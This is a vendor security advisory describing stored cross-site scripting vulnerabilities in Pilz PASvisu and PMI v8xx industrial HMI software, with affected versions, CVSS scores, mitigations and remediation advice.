Back to overview

Pilz: Vulnerability in PASvisu and PMI v8xx

VDE-2023-050
Last update
04/10/2025 15:00
Published at
01/30/2024 08:00
Vendor(s)
Pilz GmbH & Co. KG
External ID
VDE-2023-050
CSAF Document
Download

Summary

Multiple Pilz products are affected by stored cross-site-scripting (XSS) vulnerabilities. The vulnerabilities may enable an attacker to gain full control over the system.

Update: 27.02.2024 Fix typo in advisory title

Impact

The vulnerabilities allow an attacker to inject malicious Javascript code into the system. With PASvisu
Builder in a worst-case scenario this can lead to execution of arbitrary code using the privileges of the
user running the affected software. With PASvisu Runtime (including PMI v8xx) in a worst-case
scenario this could have an impact on the controlled automation application.

Affected Product(s)

Model no. Product name Affected versions
PASvisu <1.14.1
266807, 266812, 266815 PMI v8xx PILZ Firmware PMI v8xx <=2.0.33992

Vulnerabilities

Expand / Collapse all

Published
02/09/2026 08:38
Severity
8.1 CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H
Weakness
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') (CWE-79)
Summary

A stored cross-site scripting vulnerability in the Runtime component of Pilz PASvisu before 1.14.1 and PMI v8xx up to and including 2.0.33992 allows a low-privileged remote unauthenticated attacker to manipulate process data with potential impact on integrity and/or availability.

References
cve.org | nvd.nist.gov

Published
02/09/2026 08:38
Severity
7.8 CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
Weakness
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') (CWE-79)
Summary

A cross-site scripting vulnerability in the Builder Component of Pilz PASvisu before 1.14.1 allows a local unauthenticated attacker to inject malicious javascript and gain full control over the device.

References
cve.org | nvd.nist.gov

Mitigation

  • Only use project files from trustworthy sources.
  • Protect project files against modification by unauthorized users.
  • PASvisu Runtime: Limit network access to legitimate connections by using a firewall or similar
    measures. Use password protection on the online project.

Remediation

Install the fixed product version as soon as it is available. Please visit the Pilz eShop
(https://www.pilz.com/en-INT/eshop external link) to check for the fixed version

Acknowledgments

Pilz GmbH & Co. KG thanks the following parties for their efforts:

Revision History

Version Date Summary
1 01/30/2024 08:00 Initial revision.
2 02/27/2024 15:00 Updated Title.
3 11/06/2024 12:27 Fix: correct certvde domain, added self-reference
4 04/10/2025 15:00 fixed version operators